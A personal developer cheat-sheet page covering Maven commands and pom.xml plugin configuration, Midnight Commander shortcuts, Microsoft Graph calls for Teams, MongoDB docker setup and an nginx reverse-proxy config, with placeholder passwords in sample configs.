            <!-- End Matomo Tag Manager -->

</head>
select * from matomo_log_visit --  contains one entry per visit (returning visitor)
select * from matomo_log_action --  contains all the type of actions possible on the website (e.g. unique URLs, page titles, download URLs…)
select * from matomo_log_link_visit_action --  contains one entry per action of a visitor (page view, …)
select * from matomo_log_conversion --  contains conversions (actions that match goals) that happen during a visit
select * from matomo_log_conversion_item --  contains e-commerce conversion items

DataLayer

var _mtm = window._mtm = window._mtm || [];
var _paq = window._paq = window._paq || [];

_paq.push(['setCustomVariable',1,"list-id","13,14,15,16","page"]);

window._mtm.push({'event': 'fire-showing-search-window'});
// select * from matomo_log_link_visit_action

// _paq.push(['trackPageView']);

Maven cheat sheet

Repositories

maven phases

image

maven scope explanations

maven scopes

create project, init project, new project

example of creating project create project empty

mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.startup.searchcorrector -DartifactId=searchcorrector -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false

example of creating project create web project maven create Java web project empty web project

mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.startup.searchcorrector -DartifactId=workplace -DarchetypeArtifactId=maven-archetype-webapp -DinteractiveMode=false
mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.smava.onsite -DartifactId=soap-calculator -DarchetypeArtifactId=maven-archetype-webapp -DinteractiveMode=false

for creating Eclipse Web project ( change pom.xml:packaging to "war" ) :

mvn eclipse:eclipse -Dwtpversion=2.0

build with many threads

mvn -T 1C clean install # 1 per thread 
mvn -T 4 clean install # 4 threads

build sub-modules with parent-dependencies

mvn -am ...
mvn --also-make ...

build in another folder specify project folder specify project directory

mvn -f $DIR_PROJECT/data-manager/pom.xml

list of all modules

mvn org.qunix:structure-maven-plugin:modules

build only one module, build one module, single module build

# mvn --projects common/common-utils clean install
mvn -pl common/common-utils clean install

or build with all dependencies

mvn --threads 2C --projects common/common-utils -am clean install

build without module skip module

mvn -f $DIR_PROJECT/pom.xml clean install -pl -:processing-common -Dmaven.test.skip=true -DskipTests 
mvn -f $DIR_PROJECT/pom.xml clean install -pl '-:processing-common,-:processing-e2e' -Dmaven.test.skip=true -DskipTests 
mvn clean package -pl '!:processing-common,!:processing-mapr-ojai-common'

continue to build after interruption

mvn --resume-from :processing-common install -Dmaven.test.skip=true -DskipTests 

dry run

mvn -q -Dexec.executable=echo -Dexec.args='${project.version}' --non-recursive org.codehaus.mojo:exec-maven-plugin:1.3.1:exec

for complex project print dependency tree

mvn dependency:tree | grep "^\\[INFO\\] [+\]" | awk '{print $NF}' | grep "^com.cherkashyn.vitalii" | awk -F ':' '{print $1":"$2}' > /home/projects/components.list
find . -name src | awk -F 'src' '{print $1}' | while read line; do
    echo ">>> " $line "   " `mvn -f $line"pom.xml" dependency:tree | grep "\\[INFO\\] --- maven-dependency-plugin" | awk -F '@' '{print $2}' | awk '{print $1}'`
    mvn  -f $line"pom.xml" dependency:tree | grep "^\\[INFO\\] [+-|\]" | awk '{print $NF}' | grep "^com.cherkashyn.vitalii" | awk -F ':' '{print $1":"$2}' | python python-utilities/console/string-in-list.py /home/projects/components.list
done

build only specific subproject

mvn clean install --projects :artifact_id

build test coverage

plugin:

org.scoverage:scoverage-maven-plugin:1.3.0:report
mvn scoverage:report --projects :artifact_id

single test running, start one test, certain test

https://maven.apache.org/surefire/maven-surefire-plugin/examples/single-test.html

# scala
mvn clean -Dsuites=*SpeedLimitSignalsSpec* test
mvn -Dtest=DownloadServiceImplTest* test

scalatest

mvn -Denable-scapegoat-report -Dintegration.skipTests -Dscoverage.skip -Djacoco.skip -Dsuites="*LabelerJobArgumentsTest" test 

cobertura help,

mvn cobertura:help -Ddetail=true

cobertura html

mvn cobertura:clean cobertura:cobertura -Dcobertura.report.format=html

Java Vaadin project

mvn archetype:generate -DarchetypeGroupId=com.vaadin -DarchetypeArtifactId=vaadin-archetype-application -DarchetypeVersion=7.2.5 -DgroupId=com.cherkashyn.vitalii.tools.barcode.ui -DartifactId=BarCodeUtilsUI -Dversion=1.0 -Dpackaging=war

Java console application

mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.akka.web -DartifactId=akka-web -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false
 mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.testtask.kaufland -DartifactId=anagrams -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false

Java OSGi bundle

mvn archetype:generate -DarchetypeGroupId=org.apache.karaf.archetypes -DarchetypeArtifactId=karaf-bundle-archetype -DarchetypeVersion=2.3.5 -DgroupId=com.cherkashyn.vitalii.osgi.test.listener -DartifactId=osgi-service-listener -Dversion=1.0.0-SNAPSHOT

Java OSGi Blueprint bundle

mvn archetype:generate -DarchetypeGroupId=org.apache.karaf.archetypes -DarchetypeArtifactId=karaf-blueprint-archetype -DarchetypeVersion=2.3.5 -DgroupId=com.cherkashyn.vitalii.osgi.test -DartifactId=osgi-blueprint-consumer -Dversion=1.0.0-SNAPSHOT

Java OSGi Karaf bundle

mvn archetype:generate -DarchetypeGroupId=org.apache.karaf.archetypes -DarchetypeArtifactId=karaf-bundle-archetype -DarchetypeVersion=2.2.8 -DgroupId=com.mycompany -DartifactId=KarafExample -Dversion=1.0-SNAPSHOT -Dpackage=com.mycompany.bundle

debug from IDE, IDE debug

-DforkCount=0 -DreuseForks=false -DforkMode=never 

remote debug, remote projecess debug

%MAVEN_HOME%/bin/mvnDebug

Download Sources and JavaDoc

-DdownloadSources=true -DdownloadJavadocs=true

download single artifact, download jar

mvn -DgroupId=com.oracle -DartifactId=ojdbc14 -Dversion=10.2.0.4.0 dependency:get

using another local repo

mvn clean package --batch-mode --no-transfer-progress -Dmaven.repo.local=/my/own/path/.m2/repository

install missed jar in local repo

mvn install:install-file -Dfile=jaaf-core-jee7-1.05.00.jar -DgroupId=net.ubs.security.jaaf -DartifactId=jaaf-core -Dversion=1.05.00 -Dpackaging=jar

security settings

~/.m2/settings.xml artifactory token generation

<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/SETTINGS/1.1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.1.0 http://maven.apache.org/xsd/settings-1.1.0.xsd">

    <servers>
        <server>
            <id>data-manager-releases</id>
            <username>cherkavi</username>
	    <password>eyJ2ZXIiO....</password>
        </server>
    </servers>
</settings>

exclude sub-library from dependency lib

        <dependency>
            <groupId>org.quartz-scheduler</groupId>
            <artifactId>quartz</artifactId>
            <version>2.3.0</version>
            <exclusions>
                <exclusion>
                    <groupId>com.zaxxer</groupId>
                    <artifactId>HikariCP-java6</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

describe plugin

mvn help:describe -Dplugin=org.apache.tomcat.maven:tomcat7-maven-plugin
mvn help:describe  -DgroupId=org.springframework.boot -DartifactId=spring-boot-maven-plugin -Ddetail=true

Oracle depencdencies

            <dependencies>
                <dependency>
                    <groupId>com.github.noraui</groupId>
                    <artifactId>ojdbc7</artifactId>
                    <version>${oracle.driver.version}</version>
                </dependency>
            </dependencies>

Oracle driver

Class<?> driverClass = Class.forName("oracle.jdbc.driver.OracleDriver");

settings

location of settings file, maven config

mvn -X help | grep settings.xml
mvn -X | grep settings.xml

proxy settings

  • $MAVEN_HOME/conf/settings.xml
  • ${user.home}/.m2/settings.xml
<proxies>
    <proxy>
      <active>true</active>
      <protocol>http</protocol>
      <host>proxy.somewhere.com</host>
      <port>8080</port>
      <username>proxyuser</username>
      <password>somepassword</password>
      <nonProxyHosts>www.google.com|*.somewhere.com</nonProxyHosts>
    </proxy>
  </proxies>

!!! important - if your password contains symbols like $,&... pls, use escape characters like: & or

mvn compile -Dhttp.proxyHost=10.10.0.100 -Dhttp.proxyPort=8080 -Dhttp.nonProxyHosts=localhost|127.0.0.1 -Dhttp.proxyUser=baeldung -Dhttp.proxyPassword=changeme

Plugins:

release plugin

mvn -f ../pom.xml versions:set -DnewVersion=%1
mvn -f ../pom.xml -N versions:update-child-modules

javadoc

mvn javadoc:javadoc
 -Dmaven.javadoc.skip=true

jar without class, no class files

# put java files to proper place
mkdir src/main/java

executable jar, uber jar plugin, fat jar, jar with all dependencies, shade plugin

example of project structure ( otherwise your custom classes woun't be added )

├── pom.xml
└── src
    ├── main
    │   └── java
    │       └── com
    │           └── cherkashyn
    │               └── vitalii
    │                   └── tools
    │                       ├── App.java
    │                       └── JarExtractor.java
    └── test
        └── java
            └── com
                └── cherkashyn
                    └── vitalii
                        └── tools
                            ├── AppTest.java
                            └── JarExtractorTest.java

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <packaging>jar</packaging>
    <version>1.0</version>
    <name>db-checker</name>

    <groupId>com.cherkashyn.vitalii.db</groupId>
    <artifactId>checker</artifactId>

    <dependencies>

        <!-- https://mvnrepository.com/artifact/org.postgresql/postgresql -->
        <dependency>
            <groupId>org.postgresql</groupId>
            <artifactId>postgresql</artifactId>
            <version>42.2.12</version>
        </dependency>

    </dependencies>

    <build>
        <testResources>
            <testResource>
                <directory>src/test/resources</directory>
            </testResource>
        </testResources>
        <resources>
            <resource>
                <directory>src/main/resources</directory>
            </resource>
        </resources>
        <plugins>

            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.1</version>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                </configuration>
            </plugin>

            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-assembly-plugin</artifactId>
                <!-- version>2.5.4</version -->
                <configuration>
                    <descriptorRefs>
                        <descriptorRef>jar-with-dependencies</descriptorRef>
                    </descriptorRefs>
                    <archive>
                        <!-- manifestFile>${project.basedir}/src/main/resources/META-INF/MANIFEST.MF</manifestFile -->
                        <manifest>
                            <mainClass>com.cherkashyn.vitalii.db.PostgreCheck</mainClass>
                        </manifest>
                    </archive>
                    <!-- Remove the "-jar-with-dependencies" at the end of the file -->
                    <appendAssemblyId>false</appendAssemblyId>
                </configuration>
                <executions>
                    <execution>
                        <goals>
                            <goal>attached</goal>
                        </goals>
                        <phase>package</phase>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>

</project>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <configuration>
                    <source>8</source>
                    <target>8</target>
                </configuration>
            </plugin>

            <!-- Error: A JNI error has occurred, please check your installation and try again
Exception in thread "main" java.lang.SecurityException: Invalid signature file digest for Manifest main attributes -->
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-shade-plugin</artifactId>
                <version>3.1.1</version>
                <executions>
                    <execution>
                        <phase>package</phase>
                        <goals>
                            <goal>shade</goal>
                        </goals>
                        <configuration>
                            <transformers>
                                <transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer">
                                    <mainClass>com.vodafone.SshClient</mainClass>
                                </transformer>
                            </transformers>
                            <shadedArtifactAttached>true</shadedArtifactAttached>
                            <shadedClassifierName>launcher</shadedClassifierName>
                            <!-- <minimizeJar>true</minimizeJar> -->
                            <artifactSet>
                                <excludes>
                                    <exclude>junit:junit</exclude>
                                    <exclude>jmock:*</exclude>
                                    <exclude>*:xml-apis</exclude>
                                    <exclude>org.apache.maven:lib:tests</exclude>
                                </excludes>
                            </artifactSet>
                        </configuration>
                    </execution>
                </executions>
            </plugin>

jgitflow plugin

official documentation configuration description

                <plugin>
                    <groupId>external.atlassian.jgitflow</groupId>
                    <artifactId>jgitflow-maven-plugin</artifactId>
                    <version>1.0-m5.1</version>
                    <configuration>
                        <enableSshAgent>true</enableSshAgent>
                        <autoVersionSubmodules>true</autoVersionSubmodules>
                        <allowSnapshots>true</allowSnapshots>
                        <releaseBranchVersionSuffix>RC</releaseBranchVersionSuffix>
			<developBranchName>wave3_1.1</developBranchName>
                        <pushReleases>true</pushReleases>
                        <noDeploy>true</noDeploy>
                    </configuration>
                </plugin>
mvn jgitflow:release-start
mvn jgitflow:release-finish -Dmaven.javadoc.skip=true -DskipTests=true -Dsquash=false -DpullMaster=true

if you have issue with 'conflict with master...' - just merge master to develop

maven tomcat plugin

mvn  org.apache.tomcat.maven:tomcat7-maven-plugin:2.2:redeploy -Dmaven.test.skip -Dmaven.tomcat.url=http://host:8080/manager/text -Dtomcat.username=manager -Dtomcat.password=manager

%TOMCAT%/conf/tomcat-users.xml:

  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-jmx"/>
  <role rolename="manager-status"/>
  <role rolename="admin-gui"/>
  <role rolename="admin-script"/>
  <user username="manager" password="manager" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script"></user>

vert.x project

mvn vertx:run

            <dependency>
                <groupId>io.vertx</groupId>
                <artifactId>vertx-dependencies</artifactId>
                <version>${vertx.version}</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>

            <plugin>
                <groupId>io.fabric8</groupId>
                <artifactId>vertx-maven-plugin</artifactId>
                <version>${vertx-maven-plugin.version}</version>
                <executions>
                    <execution>
                        <id>vmp</id>
                        <goals>
                            <goal>initialize</goal>
                            <goal>package</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <redeploy>true</redeploy>
                    <jvmArgs>-Djava.net.preferIPv4Stack=true</jvmArgs>
                </configuration>
            </plugin>

spring boot project

mvn spring-boot:run

      <plugin>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-maven-plugin</artifactId>
        <version>${spring-boot.version}</version>
        <executions>
          <execution>
            <goals>
              <goal>repackage</goal>
            </goals>
          </execution>
        </executions>
        <configuration>
          <jvmArguments>-Djava.net.preferIPv4Stack=true -Dserver.port=9000 -Dspring.cloud.kubernetes.enabled=false</jvmArguments>
        </configuration>
      </plugin>

fabric8 with Vert.x deployment ( Source-to-Image S2I )

fabric8 source code and examples maven fabric8 documentation

mvn fabric8 mvn fabric8:deploy mvn fabric8:undeploy

            <plugin>
                <groupId>io.fabric8</groupId>
                <artifactId>fabric8-maven-plugin</artifactId>
                <version>${fabric8.maven.plugin.version}</version>
                <executions>
                    <execution>
                        <goals>
                            <goal>resource</goal>
                            <goal>build</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <resources>
                        <labels>
                            <all>
                                <property>
                                    <name>app</name>
                                    <value>{app-name}</value>
                                </property>
                            </all>
                        </labels>
                    </resources>
                    <enricher>
                        <excludes>
                            <exclude>vertx-health-check</exclude>
                        </excludes>
                    </enricher>
                    <generator>
                        <includes>
                            <include>vertx</include>
                        </includes>
                        <config>
                            <vertx>
                                <from>registry.access.redhat.com/redhat-openjdk-18/openjdk18-openshift:1.1</from>
                            </vertx>
                        </config>
                    </generator>
                </configuration>
            </plugin>

fabric8 with SpringBoot deployment ( Source-to-Image S2I )

mvn fabric8 mvn fabric8:deploy mvn fabric8:undeploy

      <plugin>
        <groupId>io.fabric8</groupId>
        <artifactId>fabric8-maven-plugin</artifactId>
        <version>${fabric8.maven.plugin.version}</version>
        <executions>
          <execution>
            <goals>
              <goal>resource</goal>
              <goal>build</goal>
            </goals>
          </execution>
        </executions>
        <configuration>
          <resources>
              <labels>
                  <all>
                      <property>
                          <name>app</name>
                          <value>{app-name}</value>
                      </property>
                  </all>
              </labels>
          </resources>
          <enricher>
            <excludes>
              <exclude>spring-boot-health-check</exclude>
            </excludes>
          </enricher>
          <generator>
            <includes>
              <include>spring-boot</include>
            </includes>
            <config>
              <spring-boot>
                <from>registry.access.redhat.com/redhat-openjdk-18/openjdk18-openshift:1.1</from>
              </spring-boot>
            </config>
          </generator>
        </configuration>
      </plugin>

wildfly project

mvn wildfly-swarm:run

      <plugin>
        <groupId>org.wildfly.swarm</groupId>
        <artifactId>wildfly-swarm-plugin</artifactId>
        <version>${version.wildfly.swarm}</version>
        <executions>
          <execution>
            <goals>
              <goal>package</goal>
            </goals>
          </execution>
        </executions>
        <configuration>
          <properties>
            <java.net.preferIPv4Stack>true</java.net.preferIPv4Stack>
          </properties>
          <jvmArguments>-Dswarm.http.port=9001</jvmArguments>
        </configuration>
      </plugin>

fabric8 with WildFly, openshift with WildFly, WildFly Swarm ( Source-to-Image S2I )

mvn fabric8 mvn fabric8:deploy mvn fabric8:undeploy

      <plugin>
        <groupId>io.fabric8</groupId>
        <artifactId>fabric8-maven-plugin</artifactId>
        <version>${fabric8.maven.plugin.version}</version>
        <executions>
          <execution>
            <goals>
              <goal>resource</goal>
              <goal>build</goal>
            </goals>
          </execution>
        </executions>
        <configuration>
          <resources>
              <labels>
                  <all>
                      <property>
                          <name>app</name>
                          <value>my-app</value>
                      </property>
                  </all>
              </labels>
          </resources>
          <generator>
            <includes>
              <include>wildfly-swarm</include>
            </includes>
            <config>
              <wildfly-swarm>
                <from>registry.access.redhat.com/redhat-openjdk-18/openjdk18-openshift:1.1</from>
              </wildfly-swarm>
            </config>
          </generator>
          <enricher>
            <excludes>
              <exclude>wildfly-swarm-health-check</exclude>
            </excludes>
          </enricher>
        </configuration>
      </plugin>

set version of source code

      <build>
		<plugins>
			<plugin>
			<groupId>org.apache.maven.plugins</groupId>
			<artifactId>maven-compiler-plugin</artifactId>
			<version>3.1</version>
			<configuration>
				<source>1.6</source>
				<target>1.6</target>
			</configuration>
			</plugin>
		</plugins>
	</build>

maven war plugin

    <plugin>
        <artifactId>maven-war-plugin</artifactId>
        <version>3.1.0</version>
        <configuration>
          <failOnMissingWebXml>false</failOnMissingWebXml>
        </configuration>
      </plugin>

maven exec plugin

mvn exec:java

    <build>
        <plugins>
          <plugin>
            <groupId>org.codehaus.mojo</groupId>
            <artifactId>exec-maven-plugin</artifactId>
            <version>1.4.0</version>
            <executions>
              <execution>
                <goals>
                  <goal>java</goal>
                </goals>
              </execution>
            </executions>
            <configuration>
              <mainClass>org.cherkashyn.vitalii.test.App</mainClass>
              <arguments>
                <argument>argument1</argument>
              </arguments>
              <systemProperties>
                <systemProperty>
                  <key>myproperty</key>
                  <value>myvalue</value>
                </systemProperty>
              </systemProperties>
            </configuration>
          </plugin>
        </plugins>
      </build>

copy into package additional resources

    <resources>
      <resource>
        <directory>src/main/java</directory>
        <includes>
          <include> **/*.java </include>
          <include> **/*.properties </include>
          <include> **/*.xml </include>
        </includes>
      </resource>
      <resource>
        <directory>src/test/java</directory>
        <includes>
          <include> **/*.java </include>
          <include> **/*.properties </include>
          <include> **/*.xml </include>
        </includes>
      </resource>
    </resources>

sonar plugin

%Maven%/conf/settings.xml

		<profile>
			<id>sonar</id>
			<activation>
				<activeByDefault>true</activeByDefault>
			</activation>
			<properties>
				<sonar.jdbc.url>
				  jdbc:mysql://localhost:3306/sonar_schema?useUnicode=true&amp;characterEncoding=utf8
				</sonar.jdbc.url>
				<sonar.jdbc.driverClassName>com.mysql.jdbc.Driver</sonar.jdbc.driverClassName>
				<sonar.jdbc.username>root</sonar.jdbc.username>
				<sonar.jdbc.password></sonar.jdbc.password>

				<sonar.host.url>
				  http://localhost:9000
				</sonar.host.url>
			</properties>
		</profile>
mvn sonar:sonar

docker plugin

    <build>
        <plugins>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <executions>
                    <!-- override build docker image with additional arguments -->
                    <execution>
                        <id>docker-build</id>
                        <configuration>
                            <environmentVariables>
                                <DOCKER_BUILDKIT>${enable-docker-build-kit}</DOCKER_BUILDKIT>
                            </environmentVariables>
                            <arguments combine.children="append">
                                <argument>--secret</argument>
                                <argument>id=netrc,src=${netrc-path}</argument>
                            </arguments>
                        </configuration>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>
# Dockerfile should exists alongside with pom.xml
mvn verify -Denable-docker-build

smallest pom.xml, init pom.xml, start pom.xml

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <packaging>jar</packaging>
  <version>1.0-SNAPSHOT</version>
  <name>workplace</name>
  <url>http://maven.apache.org</url>
  
  <groupId>com.cherkashyn.vitalii.startup.searchcorrector</groupId>
  <artifactId>workplace</artifactId>
	
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
  </dependencies>
</project>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-surefire-plugin</artifactId>
                <configuration>
                    <classpathDependencyExcludes>
                        <classpathDependencyExclude>org.apache.logging.log4j:log4j-slf4j-impl</classpathDependencyExclude>
                    </classpathDependencyExcludes>
                </configuration>
            </plugin>
     <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-failsafe-plugin</artifactId>
                <configuration>
                    <classpathDependencyExcludes>
                        <classpathDependencyExclude>org.apache.logging.log4j:log4j-slf4j-impl</classpathDependencyExclude>
                    </classpathDependencyExcludes>
                </configuration>
            </plugin>
<?xml version="1.0" encoding="UTF8"?>
<toolchains>
    <toolchain>
        <type>jdk</type>
        <provides>
            <id>jdk8</id>
            <version>8</version>
            <vendor>openjdk</vendor>
        </provides>
        <configuration>
            <jdkHome>/path/to/jdk8</jdkHome>
        </configuration>
    </toolchain>
    <toolchain>
        <type>jdk</type>
        <provides>
            <id>jdk13</id>
            <version>13</version>
            <vendor>openjdk</vendor>
        </provides>
        <configuration>
            <jdkHome>/path/to/jdk13</jdkHome>
        </configuration>
    </toolchain>
</toolchains>
<properties>
  <jdk.version>8</jdk.version>
</properties>
<plugin>
    <groupId>org.apache.maven.plugins</groupId>
    <artifactId>maven-toolchains-plugin</artifactId>
    <version>${maven-toolchains-plugin.version}</version>
    <executions>
        <execution>
            <goals>
                <goal>toolchain</goal>
            </goals>
        </execution>
    </executions>
    <configuration>
        <toolchains>
            <jdk>
                <version>${jdk.version}</version>
            </jdk>
        </toolchains>
    </configuration>
</plugin>

Archetypes

The desired archetype does not exist

# https://repository.apache.org/content/groups/snapshots-group/org/apache/camel/archetypes/3.4.0-SNAPSHOT/maven-metadata.xml
#   -DarchetypePackaging=pom \
#   -Dpackaging=pom \
mvn archetype:generate\
  -X \
  -DarchetypeGroupId=org.apache.camel \
  -DarchetypeVersion=3.4.0-SNAPSHOT \
  -DarchetypeArtifactId=archetypes \
  -DarchetypeRepository=https://repository.apache.org/content/groups/snapshots-group | grep resolution

# or original 
mvn archetype:generate \
  -DarchetypeGroupId=org.apache.camel.archetypes \
  -DarchetypeArtifactId=camel-archetype-java \
  -DarchetypeVersion=3.4.0-SNAPSHOT \
  -DarchetypeRepository=https://repository.apache.org/content/groups/snapshots-group
vim $HOME/.m2/repository/archetype-catalog.xml
# https://maven.apache.org/archetype/archetype-models/archetype-catalog/archetype-catalog.html
<?xml version="1.0" encoding="UTF-8"?>
<archetype-catalog  xmlns="http://maven.apache.org/plugins/maven-archetype-plugin/archetype-catalog/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/plugins/maven-archetype-plugin/archetype-catalog/1.0.0 http://maven.apache.org/xsd/archetype-catalog-1.0.0.xsd">
  <archetypes>
    <archetype>
        <groupId>org.apache.camel</groupId>
        <artifactId>archetypes</artifactId>
        <version>3.4.0-SNAPSHOT</version>
        <repository>https://repository.apache.org/content/groups/snapshots-group</repository>
        <description>Apache camel archetype</description>
    </archetype>
  </archetypes>
</archetype-catalog>

find all plugins in project, search for all plugings in project

for each_file in `find . -name pom.xml | grep -v target`; do
    # cat $each_file | grep plugins
    AMOUNT_OF_PLUGINS=`cat $each_file | xpath -e "/project/build/plugins/plugin/artifactId | /project/profiles/profile/build/plugins/plugin/artifactId" 2>1 | wc -l`
    if [[ $AMOUNT_OF_PLUGINS > 0 ]]; then
        echo "---"
        echo $each_file"  "$AMOUNT_OF_PLUGINS 
        cat $each_file | xpath -e "/project/build/plugins/plugin/artifactId | /project/profiles/profile/build/plugins/plugin/artifactId" 2>1 | grep -v "^-- NODE"
    fi
done
# cat out.txt | grep -v "\-\-\-" | grep -v "pom.xml" | sort | uniq

shortcuts cheet-sheet

Shortcut Description
Ctrl-x i show panel Information
Ctrl-x q show panel Quick view
Ctrl-x ! show custom command result
Ctrl-Space calculate folder size
Ctrl-x t copy selected files into console
Ctrl-x d compare Directories
Ctrl-x h add to Hotlist current directory
Ctrl-x q show HEX of file
Ctrl-x c Chmod dialog
Ctrl-x o chOwn dialog
Ctrl-x s create Symlink dialog
Ctrl-x l create hard Link dialog
Alt-. Toggle "Show Hidden Files" feature
Alt-t Toggle "change panel view"
Alt-h Show command history
Alt-p Previous command in the history
Alt-n Next command into history
Alt-Shift-H Show full history of directories
Alt-y to previous directory in the historY
Alt-u to the next directory in the history
Ctrl-\ directory HotList
Alt-! ???
Alt-s Incremental search (Alt-s again to jump to next occurence)
Ctrl-s Incremental search (Alt-s again to jump to next occurence)
Alt-Shift- ? file search
Alt-i make the other panel show the same directory as the current
Alt-o make the other panel show the subfolder of selected in the current
Alt-c Quick cd dialog
Alt-? Search dialog
Alt-t Toggle mode of the showing files
Alt-g move cursor to first line on the screen
Alt-r move cursor to middle line on the screen
Alt-j move cursor to bottom line on the screen
Alt-e change panel character codEpage
Ctrl-r Refresh directory information
Ctrl-l refresh screen
sh link sh://user@host:port/path/into/remote/machine

change editor to gedit

export EDITOR=gedit

graph explorer, swagger how to use

microsoft teams example teams read all messages

** please, login to microsoft **

afterward you can retrieve "Access token"

TOKEN=eyJ0eXAiOiJKV1QiLCJub25jZSI6I...

"my joined teams"

curl 'https://graph.microsoft.com/v1.0/me/joinedTeams' -H "Authorization: Bearer $TOKEN" | jq .

find out one of the channel and retrieve "id" of it, like: "id": "45626dcc-04da-4c2f-a72a-b28b",

GROUP_ID=45626dcc-04da-4c2f-a72a-b28b

"members of the channel "

curl https://graph.microsoft.com/v1.0/groups/$GROUP_ID/members  -H "Authorization: Bearer $TOKEN" | jq .

"channels of a team which I am member of"

curl https://graph.microsoft.com/v1.0/teams/$GROUP_ID/channels  -H "Authorization: Bearer $TOKEN" | jq .

retrieve value.id of the channel, like: "id": "19:[email protected]",

CHANNEL_ID="19:[email protected]"

read messages from the channel : "messages (without replies) in a channel"

curl https://graph.microsoft.com/beta/teams/$GROUP_ID/channels/$CHANNEL_ID/messages -H "Authorization: Bearer $TOKEN" | jq .value[].body.content

teams send message

copy url to channel ( right click on the channel: copy link to channel )

Example: https://teams.microsoft.com/l/channel/19:[email protected]/Allgemein?groupId=ab123bab-xxxx-xxxx-xxxx-xxxx242b&tenantId=ab123bab-xxxx-xxxx-xxxx-xxxxxx198 channel_id="19:[email protected]" team-id == groupId team_id="ab123bab-xxxx-xxxx-xxxx-xxxx242b"

curl -H "Authorization: Bearer $TOKEN" -X POST https://graph.microsoft.com/v1.0/teams/${team_id}/channels/${channel_id}/messages  -H "Content-type: application/json" --data '
{
    "body": {
        "content": "Hello from Robot"
        }
}'

MongoDB cheat sheet

original docker container

docker pull mongo

run container from image

# unexpectedly not working:  -e MONGO_INITDB_ROOT_USERNAME=vitalii -e MONGO_INITDB_ROOT_PASSWORD=vitalii
docker run -d --name mongo -p 27017:27017 -p 28017:28017 -v /tmp/mongo/db:/data/db mongo

connect to existing container and execute 'mongo' tool

  • execute via bash connection
docker exec -it {containerID} /bin/sh
find / -name 'mongo'
mongo --host 127.0.0.1 --port 27017 -u my_user -p my_password --authenticationDatabase my_db
  • exec command directly
docker exec -it {containerID} mongo --host 127.0.0.1 -u my_user -p my_password --authenticationDatabase my_db

create user via bash, mongo eval, execute commands from bash

export MONGO_USER=vitalii export MONGO_PASS=vitalii mongo admin --eval "db.createUser({user: '$MONGO_USER', pwd: '$MONGO_PASS', roles:[{role:'root',db:'admin'}]});"

change password via 'mongo' tool

db.changeUserPassword(username, password)

start via docker-compose

version: '3.1'
services:
  mongo:
    image: mongo
    restart: always
    ports:
      - 27017:27017
      - 28017:28017
    volumes:
      - /home/technik/projects/ista/mongo-docker/container-map-folder:/data/db
    environment:
      MONGO_INITDB_ROOT_USERNAME: vitalii
      MONGO_INITDB_ROOT_PASSWORD: vitalii

  mongo-express:
    image: mongo-express
    restart: always
    ports:
      - 28018:8081
    environment:
      ME_CONFIG_MONGODB_ADMINUSERNAME: vitalii
      ME_CONFIG_MONGODB_ADMINPASSWORD: vitalii

discover environment, meta-information 'mongo' tool

commands description
show dbs Shows all databases available on this server
use acmegrocery Switches to a database called acmegrocery. Creates this database if it doesn’t already exist.
show collections Show all collections in the current db (first use <someDb>)
show users Show all users for the current DB
show roles Show the roles defined for the current DB

networking

Browser

uses "local DNS cache" or "DNS" when no found

DNS

  • ip addr v4
  • ip addr v6
  • CNAME
  • MaileXchange
  • NameServer

nginx cheat sheet

managing

sudo systemctl restart nginx
sudo nginx -s reload
sudo systemctl status nginx

nginx variables

sudo vim /etc/nginx/sites-available/appbridge
cat /etc/nginx/sites-available/appbridge
server {
        listen 80;
        listen 443;
        listen [::]:80;
        listen [::]:443;

        server_name appbridge.myhost.com;

        location / {
            proxy_set_header    X-Real-IP           $realip_remote_addr;
            proxy_set_header    X-Forwarded-For     $proxy_add_x_forwarded_for;
            proxy_set_header    Host                $http_host;
            proxy_set_header    X-Forwarded-Proto   $scheme;
            proxy_pass          http://localhost:5001/;
            proxy_set_header    X-Forwarded-Host    $host;
            proxy_set_header    X-Forwarded-Server  $server_name;

        }
}

